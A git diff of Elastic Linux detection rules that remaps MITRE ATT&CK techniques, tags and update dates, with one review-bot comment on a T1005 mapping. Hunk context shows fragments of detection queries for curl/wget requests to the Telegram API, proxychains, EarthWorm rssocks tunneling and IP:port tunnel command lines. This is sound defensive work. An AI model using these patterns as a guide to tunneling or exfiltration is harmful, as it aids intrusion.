 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -111,17 +111,7 @@ references = ["https://book.hacktricks.xyz/generic-methodologies-and-resources/t
 risk_score = 21
 rule_id = "29f0cf93-d17c-4b12-b4f3-a433800539fa"
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Command and Control",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -134,14 +124,31 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1572"
 name = "Protocol Tunneling"
 reference = "https://attack.mitre.org/techniques/T1572/"
-
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.004"
+name = "SSH"
+reference = "https://attack.mitre.org/techniques/T1021/004/"
+
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml
index 6af65daf2cc..ccb257c05e8 100644
--- a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml
+++ b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/23"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -170,9 +170,9 @@ process.name == "proxychains" and process.args : (
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1572"
-name = "Protocol Tunneling"
-reference = "https://attack.mitre.org/techniques/T1572/"
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
 [rule.threat.tactic]
 id = "TA0011"
diff --git a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml
index a32949a8673..5bc19c76442 100644
--- a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml
+++ b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/23"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
 maturity = "production"
-updated_date = "2026/02/20"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -193,6 +193,11 @@ process where host.os.type == "linux" and event.type == "start" and event.action
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
+
 [[rule.threat.technique]]
 id = "T1572"
 name = "Protocol Tunneling"
diff --git a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml
index 971d4da2b10..31058ef855f 100644
--- a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml
+++ b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/25"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/02/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -118,6 +118,11 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
+
 [[rule.threat.technique]]
 id = "T1572"
 name = "Protocol Tunneling"
diff --git a/rules/linux/command_and_control_potential_tunneling_command_line.toml b/rules/linux/command_and_control_potential_tunneling_command_line.toml
index f0209e6a64a..4bba96a97cd 100644
--- a/rules/linux/command_and_control_potential_tunneling_command_line.toml
+++ b/rules/linux/command_and_control_potential_tunneling_command_line.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/12"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/12"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -170,6 +170,11 @@ process.command_line regex """.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
+
 [[rule.threat.technique]]
 id = "T1572"
 name = "Protocol Tunneling"
diff --git a/rules/linux/command_and_control_telegram_api_request.toml b/rules/linux/command_and_control_telegram_api_request.toml
index 7c6867e61ea..43f28f4633f 100644
--- a/rules/linux/command_and_control_telegram_api_request.toml
+++ b/rules/linux/command_and_control_telegram_api_request.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/29"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -120,17 +120,12 @@ process.name in ("curl", "wget") and process.command_line like "*api.telegram.or
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Command and Control"
- id = "TA0011"
- reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat.technique]]
+id = "T1102"
+name = "Web Service"
+reference = "https://attack.mitre.org/techniques/T1102/"
- [[rule.threat.technique]]
- name = "Application Layer Protocol"
- id = "T1071"
- reference = "https://attack.mitre.org/techniques/T1071/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Web Protocols"
- id = "T1071.001"
- reference = "https://attack.mitre.org/techniques/T1071/001/"
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/command_and_control_tunneling_via_earthworm.toml b/rules/linux/command_and_control_tunneling_via_earthworm.toml
index be519817da2..426efda183d 100644
--- a/rules/linux/command_and_control_tunneling_via_earthworm.toml
+++ b/rules/linux/command_and_control_tunneling_via_earthworm.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/04/12"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -177,6 +177,11 @@ process.args : "-s" and process.args : "-d" and process.args : "rssocks"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
+
 [[rule.threat.technique]]
 id = "T1572"
 name = "Protocol Tunneling"
diff --git a/rules/linux/credential_access_collection_sensitive_files.toml b/rules/linux/credential_access_collection_sensitive_files.toml
index 71d52ec71c9..2bd89455114 100644
--- a/rules/linux/credential_access_collection_sensitive_files.toml
+++ b/rules/linux/credential_access_collection_sensitive_files.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/22"
 integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -153,24 +153,6 @@ Compression utilities like zip, tar, and gzip are essential for efficiently mana
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1552.001"
-name = "Credentials In Files"
-reference = "https://attack.mitre.org/techniques/T1552/001/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1560"
 name = "Archive Collected Data"
@@ -186,6 +168,23 @@ id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "process.command_line", "process.parent.executable"]
diff --git a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml
index 417321d89b0..32c71e4856a 100644
--- a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml
+++ b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/03/12"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -101,24 +101,6 @@ Containers are lightweight, portable environments used to run applications consi
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1552.001"
-name = "Credentials In Files"
-reference = "https://attack.mitre.org/techniques/T1552/001/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1560"
 name = "Archive Collected Data"
@@ -133,3 +115,21 @@ reference = "https://attack.mitre.org/techniques/T1560/001/"
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/linux/credential_access_gdb_init_process_hooking.toml b/rules/linux/credential_access_gdb_init_process_hooking.toml
index 646c05881fc..ef6dd41d452 100644
--- a/rules/linux/credential_access_gdb_init_process_hooking.toml
+++ b/rules/linux/credential_access_gdb_init_process_hooking.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/30"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -113,11 +113,6 @@ id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1003.007"
-name = "Proc Filesystem"
-reference = "https://attack.mitre.org/techniques/T1003/007/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
diff --git a/rules/linux/credential_access_gdb_process_hooking.toml b/rules/linux/credential_access_gdb_process_hooking.toml
index af461be6f71..de89947a394 100644
--- a/rules/linux/credential_access_gdb_process_hooking.toml
+++ b/rules/linux/credential_access_gdb_process_hooking.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/30"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -62,18 +62,7 @@ references = ["https://github.com/controlplaneio/truffleproc", "https://github.c
 risk_score = 21
 rule_id = "66c058f3-99f4-4d18-952b-43348f2577a0"
 severity = "low"
-tags = [
-    "Domain: Endpoint",
-    "OS: Linux",
-    "Use Case: Threat Detection",
-    "Tactic: Credential Access",
-    "Data Source: Elastic Defend",
-    "Data Source: Elastic Endgame",
-    "Data Source: Auditd Manager",
-    "Data Source: Crowdstrike",
-    "Data Source: SentinelOne",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 
@@ -87,19 +76,26 @@ process.args != "1"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1003.007"
-name = "Proc Filesystem"
-reference = "https://attack.mitre.org/techniques/T1003/007/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/linux/credential_access_gh_auth_via_nodejs.toml b/rules/linux/credential_access_gh_auth_via_nodejs.toml
index 1ab982a0861..ad32bc2cae0 100644
--- a/rules/linux/credential_access_gh_auth_via_nodejs.toml
+++ b/rules/linux/credential_access_gh_auth_via_nodejs.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/09/18"
 integration = ["endpoint", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
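Review bot: The new Collection entry maps attaching gdb to a live process to `T1005` (Data from Local System), which ATT&CK scopes to files and local data stores; reading another process's memory via ptrace is the behaviour `T1003` already describes, so the Collection/T1005 pairing reads as a stretch rather than a second tactic. If the intent is to cover generic memory scraping under Collection, a sentence in the rule description explaining that choice would help the next maintainer, since the tags now advertise `"Tactic: Collection"` as well. The rest of this rule (query and description) is outside the hunk, so this is raised from the mapping alone.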
@@ -48,17 +48,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
-    "Domain: Endpoint",
-    "OS: Linux",
-    "Use Case: Threat Detection",
-    "Tactic: Credential Access",
-    "Tactic: Discovery",
-    "Data Source: Elastic Defend",
-    "Data Source: Elastic Endgame",
-    "Data Source: Crowdstrike",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -69,11 +59,6 @@ process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
 [[rule.threat.technique]]
 id = "T1528"
 name = "Steal Application Access Token"
@@ -83,16 +68,3 @@ reference = "https://attack.mitre.org/techniques/T1528/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml
index b4054ccf7f8..d3e1807cea8 100644
--- a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml
+++ b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/06/17"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -82,17 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
-    "Domain: Endpoint",
-    "Domain: Container",
-    "Domain: Kubernetes",
-    "OS: Linux",
-    "Use Case: Threat Detection",
-    "Tactic: Credential Access",
-    "Tactic: Discovery",
-    "Data Source: Elastic Defend",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -134,30 +124,22 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1528"
+name = "Steal Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1528/"
+
 [[rule.threat.technique]]
 id = "T1552"
 name = "Unsecured Credentials"
 reference = "https://attack.mitre.org/techniques/T1552/"
 
-[[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
 
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/linux/credential_access_manual_memory_dumping.toml b/rules/linux/credential_access_manual_memory_dumping.toml
index d6f5ffe2135..1d2376ab2fb 100644
--- a/rules/linux/credential_access_manual_memory_dumping.toml
+++ b/rules/linux/credential_access_manual_memory_dumping.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/25"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -120,11 +120,6 @@ id = "T1003.007"
 name = "Proc Filesystem"
 reference = "https://attack.mitre.org/techniques/T1003/007/"
 
-[[rule.threat.technique]]
-id = "T1212"
-name = "Exploitation for Credential Access"
-reference = "https://attack.mitre.org/techniques/T1212/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml
index 3cfe8812e89..fc9c5844bef 100644
--- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml
+++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/09/14"
 integration = ["system"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -110,11 +110,6 @@ id = "T1110.001"
 name = "Password Guessing"
 reference = "https://attack.mitre.org/techniques/T1110/001/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1110.003"
-name = "Password Spraying"
-reference = "https://attack.mitre.org/techniques/T1110/003/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml
index 020628dd4f9..ef52de06f44 100644
--- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml
+++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/21"
 integration = ["system"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -106,11 +106,6 @@ id = "T1110.001"
 name = "Password Guessing"
 reference = "https://attack.mitre.org/techniques/T1110/001/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1110.003"
-name = "Password Spraying"
-reference = "https://attack.mitre.org/techniques/T1110/003/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
diff --git a/rules/linux/credential_access_potential_password_spraying_attack.toml b/rules/linux/credential_access_potential_password_spraying_attack.toml
index 711c7bd6fae..d29948322d0 100644
--- a/rules/linux/credential_access_potential_password_spraying_attack.toml
+++ b/rules/linux/credential_access_potential_password_spraying_attack.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/24"
 integration = ["system"]
 maturity = "production"
-updated_date = "2026/01/12"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -111,11 +111,6 @@ id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1110.001"
-name = "Password Guessing"
-reference = "https://attack.mitre.org/techniques/T1110/001/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1110.003"
 name = "Password Spraying"
diff --git a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml
index 8f8c9f7c185..f8019adac53 100644
--- a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml
+++ b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/09/14"
 integration = ["system"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -108,11 +108,6 @@ id = "T1110.001"
 name = "Password Guessing"
 reference = "https://attack.mitre.org/techniques/T1110/001/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1110.003"
-name = "Password Spraying"
-reference = "https://attack.mitre.org/techniques/T1110/003/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
diff --git a/rules/linux/credential_access_proc_credential_dumping.toml b/rules/linux/credential_access_proc_credential_dumping.toml
index f543e3ff547..f98a1a25d33 100644
--- a/rules/linux/credential_access_proc_credential_dumping.toml
+++ b/rules/linux/credential_access_proc_credential_dumping.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/04/26"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -122,11 +122,6 @@ id = "T1003.007"
 name = "Proc Filesystem"
 reference = "https://attack.mitre.org/techniques/T1003/007/"
 
-[[rule.threat.technique]]
-id = "T1212"
-name = "Exploitation for Credential Access"
-reference = "https://attack.mitre.org/techniques/T1212/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
diff --git a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml
index 0b636c1f0b6..0085884fa66 100644
--- a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml
+++ b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/03/12"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -46,14 +46,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
-    "Domain: Container",
-    "OS: Linux",
-    "Use Case: Threat Detection",
-    "Tactic: Credential Access",
-    "Data Source: Elastic Defend",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -117,3 +110,16 @@ reference = "https://attack.mitre.org/techniques/T1552/001/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml
index feb93587467..d214945e6b9 100644
--- a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml
+++ b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/10"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/11/24"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -56,15 +56,7 @@ references = [
 risk_score = 47
 rule_id = "9eaa3fb1-3f70-48ed-bb0e-d7ae4d3c8f28"
 severity = "medium"
-tags = [
-    "Domain: Endpoint",
-    "OS: Linux",
-    "Use Case: Threat Detection",
-    "Tactic: Persistence",
-    "Tactic: Credential Access",
-    "Data Source: Elastic Defend",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -77,24 +69,11 @@ sequence by host.id with maxspan=3s
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
+id = "T1056"
+name = "Input Capture"
+reference = "https://attack.mitre.org/techniques/T1056/"
 
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1554"
-name = "Compromise Host Software Binary"
-reference = "https://attack.mitre.org/techniques/T1554/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/defense_evasion_apparmor_policy_violation.toml b/rules/linux/defense_evasion_apparmor_policy_violation.toml
index 0bdc8dd8329..ba81a129497 100644
--- a/rules/linux/defense_evasion_apparmor_policy_violation.toml
+++ b/rules/linux/defense_evasion_apparmor_policy_violation.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/03/20"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2026/03/20"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -96,11 +96,6 @@ id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml
index 6b076f4a605..729612e6179 100644
--- a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml
+++ b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/08/28"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -115,9 +115,9 @@ name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 
 [[rule.threat.technique.subtechnique]]
-id = "T1562.001"
